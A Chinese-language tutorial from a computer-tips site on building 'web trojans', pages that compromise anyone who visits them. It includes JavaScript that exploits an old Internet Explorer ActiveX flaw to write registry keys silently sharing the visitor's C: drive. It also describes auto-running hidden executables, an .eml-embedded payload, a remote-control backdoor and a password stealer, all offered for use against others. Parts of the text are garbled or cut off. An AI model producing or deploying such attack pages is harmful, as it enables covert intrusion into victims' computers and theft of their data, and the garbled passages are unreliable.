萬盛學電腦網

 萬盛學電腦網 >> 應用技巧 >> 制作網頁木馬

制作網頁木馬

大家對木馬都不陌生了,它可能要算是計算機病毒史上最厲害的了,相信會使木馬的人千千萬萬,但是有很多人苦於怎麼把木馬發給對方,現在隨著計算機的普及,在網絡上我相信很少有人會再輕易的接收對方的文件了,所以網頁木馬誕生了。
1.它應該算是html帶動同路徑下的一個exe的文件的主頁了,也就是當浏覽器浏覽這個頁面的時候,一個exe的文件就在後台自動下載並執行了,可以做一個test.html的文件在桌面,內容如下:

再在桌面下隨便找個exe的文件,名字一定要改為tset.exe,好了,這時候雙擊我們剛才生成的html文件,當看到“網頁加載中,請稍後....”的時候,我們的那個同路徑下的exe文件也被無條件執行了,這種頁面的優點就是編譯修改簡單,但是!當你申請下了一個個人主頁空間的時候,把這兩個文件上傳上去的時候,當你試圖通過浏覽器浏覽你的傑作的時候,ie的安全警告跳了出來,我想沒有幾個人願意乖乖的冒著風險去點“是”,好了,盡管這個網頁木馬在本地是多麼的完美,但是放到了網上就通不過ie的安全策略了,這個小馬失敗了。
2.是通過ie自身的漏洞寫入注冊表,相信很多人經常在浏覽一些主頁的時候,注冊表被改的亂七八糟、ie標題被改、首頁被改、注冊表編輯器被禁用等等,這些都是自動修改了你的注冊表的網頁的傑作,所以我門也可以做個頁面讓浏覽者的硬盤完全共享,也是做個html的文件,內容如下:
script language=javascript>
document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();

當對方的浏覽過這個頁面的時候,他的c:就被共享了,共享後的進入方法嘛..呵呵不用說了吧,但是他雖然被共巷了,但是你還不知道誰正在看你的這個頁面,他的ip又是多少你都不知道,沒有關系,有個很簡單的方法,去163申請一個域名的轉換,如:http://dhj.126.com連接目標地址裡...褪槍蠶砹恿恕?/a>
這種網頁木馬的特點是比較安全,不宜被對方發現,但是使用麻煩需要牽扯到很多的東西。

3.也是現在最好用的一種了吧,個人認為。它是將一個小巧的exe文件作成一個.eml的文件,再用ie的漏洞讓一個html的頁面執行這個.eml的文件,你的那個小巧的exe文件就被執行了,由於代碼過長又因每個exe文件轉換後的代碼不同所以不可能一一寫出,下面給出一個地址http://dhj.126.com實際上就是一個轉...憧梢醞ü齮elnet x.x.x.x 3389來完全控制對方(這個5k的小後門是winshell5.0黑白網絡有下,同時這個winshell5.0還有一個很出色的功能,就是能下載一個你事先設置好的指定路徑下的一個文件,並執行他,我放置的是網絡深偷,如果你的殺毒軟件夠厲害的話,神偷是可以被查出來的,這裡只是實驗,實際中可以指定很多查不到的小馬,這裡不闡述),有興趣的朋友可以來試試。
這種網頁木馬的特點是,對方挨種率較高,除了制作麻煩一點外,沒有什麼缺點啦
好了所有的漏洞都是建立在系統漏洞的前提下,多升級多打補丁沒有壞處

copyright © 萬盛學電腦網 all rights reserved